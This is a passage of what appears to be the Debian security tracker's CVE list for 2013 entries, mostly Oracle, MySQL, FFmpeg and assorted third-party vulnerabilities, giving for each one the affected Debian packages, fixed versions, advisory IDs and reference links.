NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3834 (Unspecified vulnerability in the Oracle Secure Global Desktop componen ...) NOT-FOR-US: Oracle Secure Global Desktop CVE-2013-3833 (Unspecified vulnerability in the Oracle Access Manager component in Or ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3832 (Unspecified vulnerability in the Siebel Server Remote component in Ora ...) NOT-FOR-US: Oracle Siebel CRM CVE-2013-3831 (Unspecified vulnerability in the Oracle Portal component in Oracle Fus ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3830 (Unspecified vulnerability in the Hyperion Strategic Finance component ...) NOT-FOR-US: Oracle Hyperion CVE-2013-3829 (Unspecified vulnerability in the Java SE, Java SE Embedded component i ...) - openjdk-6 6b27-1.12.7-1 - openjdk-7 7u45-2.4.3-1 CVE-2013-3828 (Unspecified vulnerability in the Oracle Web Services component in Orac ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3827 (Unspecified vulnerability in the Oracle GlassFish Server component in ...) - glassfish (Full application server not packaged) CVE-2013-3826 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3825 (Unspecified vulnerability in the Oracle Agile Product Collaboration co ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3824 (Unspecified vulnerability in the Oracle Agile Collaboration Framework ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3823 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3822 (Unspecified vulnerability in the Oracle Agile PLM Framework component ...) NOT-FOR-US: Oracle Supply Chain Products Suite CVE-2013-3821 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3820 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) 
NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3819 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3818 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3817 REJECTED CVE-2013-3816 (Unspecified vulnerability in the Oracle Policy Automation component in ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-3815 REJECTED CVE-2013-3814 (Unspecified vulnerability in the Oracle Retail Invoice Matching compon ...) NOT-FOR-US: Oracle Industry Applications CVE-2013-3813 (Unspecified vulnerability in Oracle Solaris 10 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3812 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3811 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3810 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3809 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3808 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) 
{DSA-2780-1} - mysql-5.5 5.5.31 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3807 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3806 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3805 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 5.5.31 - mysql-5.1 (Only affects Mysql 5.5 and 5.6) - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3804 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3803 (Unspecified vulnerability in the Hyperion BI+ component in Oracle Hype ...) NOT-FOR-US: Oracle Hyperion CVE-2013-3802 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1 DSA-2780-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 - mariadb-5.5 (Fixed before initial upload) - mariadb-10.0 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3801 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) 
- mysql-5.5 5.5.31 - mysql-5.1 (Only affects 5.5 and 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3800 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3799 (Unspecified vulnerability in Oracle Solaris 10 and 11, when running on ...) NOT-FOR-US: Oracle Solaris CVE-2013-3798 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3797 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) NOT-FOR-US: Oracle Solaris CVE-2013-3796 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects Mysql 5.6) - mysql-5.1 (Only affects Mysql 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3795 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 (Only affects 5.5 and 5.6) - mysql-5.1 (Only affects 5.5 and 5.6) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3794 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) - mysql-5.5 5.5.31 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3793 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5 and 5.6) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3792 (Unspecified vulnerability in the Oracle VM VirtualBox component in Ora ...) 
{DLA-313-1} - virtualbox-ose [squeeze] - virtualbox-ose (Minor issue) - virtualbox 4.2.16-dfsg-1 (bug #715327) [wheezy] - virtualbox 4.1.40-dfsg-1+deb7u1 NOTE: https://www.virtualbox.org/ticket/11863 NOTE: http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html CVE-2013-3791 (Unspecified vulnerability in Enterprise Manager (EM) Base Platform 10. ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-3790 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3789 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3788 (Unspecified vulnerability in the Oracle iSupplier Portal component in ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3787 (Unspecified vulnerability in Oracle Solaris 10 and 11 allows remote at ...) NOT-FOR-US: Oracle Solaris CVE-2013-3786 (Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local ...) NOT-FOR-US: Oracle Solaris CVE-2013-3785 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3784 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3783 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...) {DSA-2818-1} - mysql-5.5 5.5.33+dfsg-1 - mysql-5.1 (Only affects 5.5) - mariadb-10.0 (Fixed before initial upload) - mariadb-5.5 (Fixed before initial upload) NOTE: http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html CVE-2013-3782 (Unspecified vulnerability in the Secure Global Desktop component in Or ...) NOT-FOR-US: Oracle Virtualization CVE-2013-3781 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3780 (Unspecified vulnerability in the PeopleSoft Enterprise Portal componen ...) 
NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3779 (Unspecified vulnerability in the Secure Global Desktop component in Or ...) NOT-FOR-US: Oracle Virtualization CVE-2013-3778 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3777 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3776 (Unspecified vulnerability in the Oracle Outside In Technology componen ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3775 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...) NOT-FOR-US: Oracle iLearning CVE-2013-3774 (Unspecified vulnerability in the Network Layer component in Oracle Dat ...) NOT-FOR-US: Oracle Database Server CVE-2013-3773 (Unspecified vulnerability in the SPARC Enterprise M Series Servers com ...) NOT-FOR-US: Oracle and Sun Systems Products Suite CVE-2013-3772 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3771 (Unspecified vulnerability in the Oracle executable component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-3770 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3769 (Unspecified vulnerability in the Oracle WebCenter Content component in ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3768 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3767 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite Access Gate CVE-2013-3766 (Unspecified vulnerability in the Primavera P6 Enterprise Project Portf ...) NOT-FOR-US: Oracle Primavera Products Suite CVE-2013-3765 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) 
NOT-FOR-US: Oracle Solaris CVE-2013-3764 (Unspecified vulnerability in the Oracle Endeca Server component in Ora ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3763 (Unspecified vulnerability in the Oracle Endeca Server component in Ora ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3762 (Unspecified vulnerability in the Enterprise Manager Base Platform comp ...) NOT-FOR-US: Oracle Enterprise Manager Grid Control CVE-2013-3761 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products Portal CVE-2013-3760 (Unspecified vulnerability in the Oracle executable component in Oracle ...) NOT-FOR-US: Oracle Database Server CVE-2013-3759 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...) NOT-FOR-US: Oracle PeopleSoft Products CVE-2013-3758 (Unspecified vulnerability in the Enterprise Manager (EM) Base Platform ...) NOT-FOR-US: Oracle Enterprise Manager CVE-2013-3757 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows re ...) NOT-FOR-US: Oracle Solaris CVE-2013-3756 (Unspecified vulnerability in the Oracle Landed Cost Management compone ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3755 (Unspecified vulnerability in the Oracle Access Manager component in Or ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2013-3754 (Unspecified vulnerability in the Solaris Cluster component in Oracle a ...) NOT-FOR-US: Solaris CVE-2013-3753 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3752 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3751 (Unspecified vulnerability in the XML Parser component in Oracle Databa ...) NOT-FOR-US: Oracle Database Server CVE-2013-3750 (Unspecified vulnerability in Oracle Solaris 11 allows local users to a ...) 
NOT-FOR-US: Oracle Solaris CVE-2013-3749 (Unspecified vulnerability in the Oracle Application Object Library com ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3748 (Unspecified vulnerability in Oracle Solaris 11 allows remote attackers ...) NOT-FOR-US: Oracle Solaris CVE-2013-3747 (Unspecified vulnerability in the Oracle Applications Technology Stack ...) NOT-FOR-US: Oracle E-Business Suite CVE-2013-3746 (Unspecified vulnerability in the Solaris Cluster component in Oracle a ...) NOT-FOR-US: Solaris CVE-2013-3745 (Unspecified vulnerability in Oracle Solaris 8, 9, 10, and 11 allows lo ...) NOT-FOR-US: Oracle Solaris CVE-2013-3744 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Only affects Java 7) - openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java) CVE-2013-3743 (Unspecified vulnerability in the Java Runtime Environment (JRE) compon ...) - openjdk-6 (Specific to Oracle Java, not present in IcedTea) NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected - openjdk-7 (Only affects Java 5 and Java 6) CVE-2013-3741 RESERVED CVE-2013-3740 RESERVED CVE-2013-3739 (Directory traversal vulnerability in editor.php in Network Weathermap ...) NOT-FOR-US: Network Weathermap CVE-2013-3738 (A File Inclusion vulnerability exists in Zabbix 2.0.6 due to inadequat ...) - zabbix 1:2.0.7+dfsg-1 NOTE: http://support.zabbix.com/browse/ZBX-6652 CVE-2013-3843 (Stack-based buffer overflow in the mk_request_header_process function ...) - monkey [squeeze] - monkey (Minor issue) CVE-2013-3919 (resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, a ...) - bind9 (vulnerable code not present) NOTE: https://kb.isc.org/article/AA-00967 CVE-2013-3742 (Cross-site scripting (XSS) vulnerability in view_create.php (aka the C ...) 
- phpmyadmin 4:4.0.1-3 (low) [wheezy] - phpmyadmin (Vulnerable code not present) [squeeze] - phpmyadmin (Vulnerable code not present) CVE-2013-3737 (The MobileUI (aka RT-Extension-MobileUI) extension before 1.04 in Requ ...) NOT-FOR-US: Request Tracker extension MobileUI CVE-2013-3736 (Cross-site scripting (XSS) vulnerability in the MobileUI (aka RT-Exten ...) NOT-FOR-US: Request Tracker extension MobileUI CVE-2013-3735 (** DISPUTED ** The Zend Engine in PHP before 5.4.16 RC1, and 5.5.0 bef ...) - php5 (unimportant) NOTE: exploitable by malicious scripts only CVE-2013-3734 (** DISPUTED ** The Embedded Jopr component in JBoss Application Server ...) NOT-FOR-US: Embedded Jopr CVE-2013-3733 RESERVED CVE-2013-3732 RESERVED CVE-2013-3731 RESERVED CVE-2013-3730 RESERVED CVE-2013-3729 (Multiple cross-site request forgery (CSRF) vulnerabilities in Kasseler ...) NOT-FOR-US: Kasseler CMS CVE-2013-3728 (Cross-site scripting (XSS) vulnerability in Kasseler CMS before 2 r123 ...) NOT-FOR-US: Kasseler CMS CVE-2013-3727 (SQL injection vulnerability in Kasseler CMS before 2 r1232 allows remo ...) NOT-FOR-US: Kasseler CMS CVE-2013-3726 REJECTED CVE-2013-3725 (Invision Power Board (IPB) through 3.x allows admin account takeover l ...) NOT-FOR-US: Invision Power Board CVE-2013-3724 (The mk_request_header_process function in mk_request.c in Monkey 1.1.1 ...) - monkey (low) [squeeze] - monkey (Minor issue) CVE-2013-3723 RESERVED CVE-2013-3722 (A Denial of Service (infinite loop) exists in OpenSIPS before 1.10 in ...) - opensips (Fixed before initial upload to Debian) NOTE: https://github.com/OpenSIPS/opensips/commit/54e027adfa486cfcf993828512b2e273aeb163c2 CVE-2013-3721 (SQL injection vulnerability in awards.php in PsychoStats 3.2.2b allows ...) NOT-FOR-US: PsychoStats CVE-2013-3720 (Cross-site scripting (XSS) vulnerability in widget_remove.php in the F ...) NOT-FOR-US: Wordpress plugin Feedweb CVE-2013-3719 (Cross-site scripting (XSS) vulnerability in the aiContactSafe componen ...) 
NOT-FOR-US: Joomla! CVE-2013-3718 (evince is missing a check on number of pages which can lead to a segme ...) - evince 3.10.0-1 [wheezy] - evince [squeeze] - evince (Vulnerable code not present) NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=701302 CVE-2013-3717 RESERVED CVE-2013-3716 RESERVED CVE-2013-3715 RESERVED CVE-2013-3714 RESERVED CVE-2013-3713 (The image creation configuration in aaa_base before 16.26.1 for openSU ...) NOT-FOR-US: openSUSE live installer CVE-2013-3712 (SUSE Studio Onsite 1.3.x before 1.3.6 and SUSE Studio Extension for Sy ...) NOT-FOR-US: SUSE Studio Onsite CVE-2013-3711 RESERVED CVE-2013-3710 (SUSE Lifecycle Management Server (SLMS) before 1.3.7 does not generate ...) NOT-FOR-US: SUSE Lifecycle Management Server CVE-2013-3709 (WebYaST 1.3 uses weak permissions for config/initializers/secret_token ...) NOT-FOR-US: WebYast CVE-2013-3708 (The id1.GetPrinterURLList function in Novell iPrint Client before 5.93 ...) NOT-FOR-US: Novell iPrint Client CVE-2013-3707 (The HTTPSTK service in the novell-nrm package before 2.0.2-297.305.302 ...) NOT-FOR-US: Novell Open Enterprise Server 2 CVE-2013-3706 (Directory traversal vulnerability in the PreBoot service in Novell ZEN ...) NOT-FOR-US: Novell ZENworks Configuration Management CVE-2013-3705 (The VBA32 AntiRootKit component for Novell Client 2 SP3 before IR5 on ...) NOT-FOR-US: Novell Client CVE-2013-3704 (The RPM GPG key import and handling feature in libzypp 12.15.0 and ear ...) - libzypp (Fixed before initial upload) CVE-2013-3703 (The controller of the Open Build Service API prior to version 2.4.4 is ...) NOT-FOR-US: Open Build Service CVE-2013-3702 REJECTED CVE-2013-3701 REJECTED CVE-2013-3700 RESERVED CVE-2013-3699 REJECTED CVE-2013-3698 REJECTED CVE-2013-3697 (Integer overflow in the NWFS.SYS kernel driver 4.91.5.8 in Novell Clie ...) 
	NOT-FOR-US: Novell Client on Windows
CVE-2013-3696
	RESERVED
CVE-2013-3695
	RESERVED
CVE-2013-3694 (BlackBerry Link before 1.2.1.31 on Windows and before 1.1.1 build 39 o ...)
	NOT-FOR-US: BlackBerry Link
CVE-2013-3693 (The BlackBerry Universal Device Service in BlackBerry Enterprise Servi ...)
	NOT-FOR-US: BlackBerry
CVE-2013-3692 (BlackBerry 10 OS before 10.0.10.648 on BlackBerry Z10 smartphones uses ...)
	NOT-FOR-US: Blackberry OS
CVE-2013-3691 (AirLive POE-2600HD allows remote attackers to cause a denial of servic ...)
	NOT-FOR-US: AirLive POE-2600HD
CVE-2013-3690 (Cross-site request forgery (CSRF) vulnerability in cgi-bin/users.cgi i ...)
	NOT-FOR-US: Brickcom
CVE-2013-3689 (Brickcom FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E, ...)
	NOT-FOR-US: Brickcom
CVE-2013-3688 (The TP-Link IP Cameras TL-SC3171, TL-SC3130, TL-SC3130G, TL-SC3171G, a ...)
	NOT-FOR-US: TP-Link
CVE-2013-3687 (AirLive POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, ...)
	NOT-FOR-US: AirLive cameras
CVE-2013-3686 (cgi-bin/operator/param in AirLive WL2600CAM and possibly other camera ...)
	NOT-FOR-US: AirLive
CVE-2013-3685 (A Privilege Escalation Vulnerability exists in Sprite Software Spriteb ...)
	NOT-FOR-US: Sprite Software's backup software for Android
CVE-2013-3684 (NextGEN Gallery plugin before 1.9.13 for WordPress: ngggallery.php fil ...)
	NOT-FOR-US: NextGEN Gallery plugin for WordPress
CVE-2013-3683
	RESERVED
CVE-2013-3682
	RESERVED
CVE-2013-3681
	RESERVED
CVE-2013-3680
	RESERVED
CVE-2013-3679
	RESERVED
CVE-2013-3678 (Multiple unspecified vulnerabilities in SAP Governance, Risk, and Comp ...)
	NOT-FOR-US: SAP
CVE-2013-3677
	RESERVED
CVE-2013-3676
	RESERVED
CVE-2013-3675 (The process_frame_obj function in sanm.c in libavcodec in FFmpeg befor ...)
	- ffmpeg (Smush codec not present in 0.5 ffmpeg)
	- libav (Smush codec not present in libav)
CVE-2013-3674 (The cdg_decode_frame function in cdgraphics.c in libavcodec in FFmpeg ...)
{DSA-3003-1} - ffmpeg (CD Graphics Video Decoder not present in 0.5 ffmpeg) - libav 6:10.4-1 NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=7ef2dbd2392e3e4d430e0173e1e5c4df9f18b6dd NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a1599f3f7ea8478d1f6a95e59e3bc6bc86d5f812 CVE-2013-3673 (The gif_decode_frame function in gifdec.c in libavcodec in FFmpeg befo ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-3672 (The mm_decode_inter function in mmvideo.c in libavcodec in FFmpeg befo ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.4-1 NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=7fa6db2545643efb4fe2e0bb501fa50af35a6330 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=70cd3b8e659c3522eea5c16a65d14b8658894a94 CVE-2013-3671 (The format_line function in log.c in libavutil in FFmpeg before 1.2.1 ...) - ffmpeg (Doesn't affect libav, specific to current ffmpeg) - libav (Doesn't affect libav, specific to current ffmpeg) CVE-2013-3670 (The rle_unpack function in vmdav.c in libavcodec in FFmpeg git 2013032 ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10-1 [wheezy] - libav (Vulnerable code not present in 0.8) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commit;h=0baa0a5a02e16ef097ed9f72bc8a7d7b585c7652 NOTE: [Anton] not present in 0.8, 10 or master; possibly present in 9 CVE-2013-3669 RESERVED CVE-2013-3668 RESERVED CVE-2013-3667 (The software update mechanism as used in Bare Bones Software Yojimbo b ...) NOT-FOR-US: Various proprietary software updaters CVE-2013-3666 (The LG Hidden Menu component for Android on the LG Optimus G E973 allo ...) NOT-FOR-US: LG Hidden Menu CVE-2013-3665 (Unspecified vulnerability in Autodesk AutoCAD through 2014, AutoCAD LT ...) 
NOT-FOR-US: AutoCAD CVE-2013-3664 (Trimble SketchUp (formerly Google SketchUp) before 2013 (13.0.3689) al ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3663 (Heap-based buffer overflow in paintlib, as used in Trimble SketchUp (f ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3662 (Timbre SketchUp (formerly Google SketchUp) before 8 Maintenance 2 allo ...) NOT-FOR-US: Trimble SketchUp CVE-2013-3661 (The EPATHOBJ::bFlatten function in win32k.sys in Microsoft Windows XP ...) NOT-FOR-US: Microsoft Windows CVE-2013-3660 (The EPATHOBJ::pprFlattenRec function in win32k.sys in the kernel-mode ...) NOT-FOR-US: Microsoft Windows CVE-2013-3659 (The NTT DOCOMO overseas usage application 2.0.0 through 2.0.4 for Andr ...) NOT-FOR-US: Android application NTT DOCOMO CVE-2013-3658 (Directory traversal vulnerability in VMware ESXi 4.0 through 5.0, and ...) NOT-FOR-US: VMware CVE-2013-3657 (Buffer overflow in VMware ESXi 4.0 through 5.0, and ESX 4.0 and 4.1, a ...) NOT-FOR-US: VMware CVE-2013-3656 (Cybozu Office 9.1.0 and earlier does not properly manage sessions, whi ...) NOT-FOR-US: Cybozu Office CVE-2013-3655 (The Sharp AQUOS PhotoPlayer HN-PP150 with firmware before 1.04.00.04 a ...) NOT-FOR-US: Sharp AQUOS PhotoPlayer CVE-2013-3654 (Directory traversal vulnerability in LOCKON EC-CUBE 2.12.0 through 2.1 ...) NOT-FOR-US: EC-CUBE CVE-2013-3653 (Multiple cross-site scripting (XSS) vulnerabilities in the RecommendSe ...) NOT-FOR-US: EC-CUBE CVE-2013-3652 (Cross-site scripting (XSS) vulnerability in data/class/pages/products/ ...) NOT-FOR-US: EC-CUBE CVE-2013-3651 (LOCKON EC-CUBE 2.11.2 through 2.12.4 allows remote attackers to conduc ...) NOT-FOR-US: EC-CUBE CVE-2013-3650 (Directory traversal vulnerability in the lfCheckFileName function in d ...) NOT-FOR-US: EC-CUBE CVE-2013-3649 (Cross-site scripting (XSS) vulnerability in KENT-WEB CLIP-MAIL before ...) NOT-FOR-US: KENT-WEB CLIP-MAIL CVE-2013-3648 (Cross-site scripting (XSS) vulnerability in KENT-WEB POST-MAIL before ...) 
NOT-FOR-US: KENT-WEB POST-MAIL CVE-2013-3647 (The WebView class in the Cybozu Live application before 2.0.1 for Andr ...) NOT-FOR-US: Cybozu Live for Android CVE-2013-3646 (The Cybozu Live application before 2.0.1 for Android allows remote att ...) NOT-FOR-US: Cybozu Live for Android CVE-2013-3645 (Cross-site scripting (XSS) vulnerability in the Orchard.Comments modul ...) NOT-FOR-US: Orchard CVE-2013-3644 (Unspecified vulnerability in JustSystems Ichitaro 2006 through 2013; I ...) NOT-FOR-US: JustSystems Ichitaro CVE-2013-3643 (The Galapagos Browser application for Android does not properly implem ...) NOT-FOR-US: Galapagos Browser application for Android CVE-2013-3642 (The Angel Browser application 1.47b and earlier for Android 1.6 throug ...) NOT-FOR-US: Angel Browser application CVE-2013-3641 (The Pizza Hut Japan Official Order application before 1.1.1.a for Andr ...) NOT-FOR-US: The Pizza Hut Japan Official Order for Android CVE-2013-3640 (Cross-site scripting (XSS) vulnerability in the Instant Web Publish fu ...) NOT-FOR-US: FileMaker Pro CVE-2013-3639 (Multiple cross-site scripting (XSS) vulnerabilities in Xaraya 2.4.0-b1 ...) NOT-FOR-US: Xaraya CVE-2013-3638 (SQL injection vulnerability in Boonex Dolphin before 7.1.3 allows remo ...) NOT-FOR-US: Boonex Dolphin CVE-2013-3637 (ProjectPier 0.8.8 does not use the Secure flag for cookies ...) NOT-FOR-US: ProjectPier CVE-2013-3636 (ProjectPier 0.8.8 has a Remote Information Disclosure Weakness because ...) NOT-FOR-US: ProjectPier CVE-2013-3635 (ProjectPier 0.8.8 has stored XSS ...) NOT-FOR-US: ProjectPier CVE-2013-3634 (A vulnerability has been identified in SCALANCE X-200 switch family (i ...) NOT-FOR-US: Siemens switches CVE-2013-3633 (A vulnerability has been identified in SCALANCE X-200 switch family (i ...) NOT-FOR-US: Siemens CVE-2013-3632 (The Cron service in rpc.php in OpenMediaVault allows remote authentica ...) 
	NOT-FOR-US: OpenMediaVault
CVE-2013-3631 (NAS4Free 9.1.0.1.804 and earlier allows remote authenticated users to ...)
	NOT-FOR-US: NAS4Free
CVE-2013-3630 (Moodle through 2.5.2 allows remote authenticated administrators to exe ...)
	NOTE: For Moodle: Not a security issue according to upstream, only applicable to administrators, see bug #775842
	NOTE: https://tracker.moodle.org/browse/MDL-41449
	NOTE: https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats
CVE-2013-3629 (ISPConfig 3.0.5.2 has Arbitrary PHP Code Execution ...)
	NOT-FOR-US: ISPConfig
CVE-2013-3628 (Zabbix 2.0.9 has an Arbitrary Command Execution Vulnerability ...)
	NOTE: Historic Zabbix issue
CVE-2013-3627 (FrameworkService.exe in McAfee Framework Service in McAfee Managed Age ...)
	NOT-FOR-US: McAfee
CVE-2013-3626 (Directory traversal vulnerability in the Session Server in Attachmate ...)
	NOT-FOR-US: Attachmate Verastream Host Integrator
CVE-2013-3625 (An unspecified DLL file in Baramundi Management Suite 7.5 through 8.9 ...)
	NOT-FOR-US: Baramundi Management Suite
CVE-2013-3624 (The OS deployment feature in Baramundi Management Suite 7.5 through 8. ...)
	NOT-FOR-US: Baramundi Management Suite
CVE-2013-3623 (Multiple stack-based buffer overflows in cgi/close_window.cgi in the w ...)
	NOT-FOR-US: Intelligent Platform Management Interface
CVE-2013-3622 (Buffer overflow in logout.cgi in the Intelligent Platform Management I ...)
	NOT-FOR-US: Intelligent Platform Management Interface
CVE-2013-3621
	REJECTED
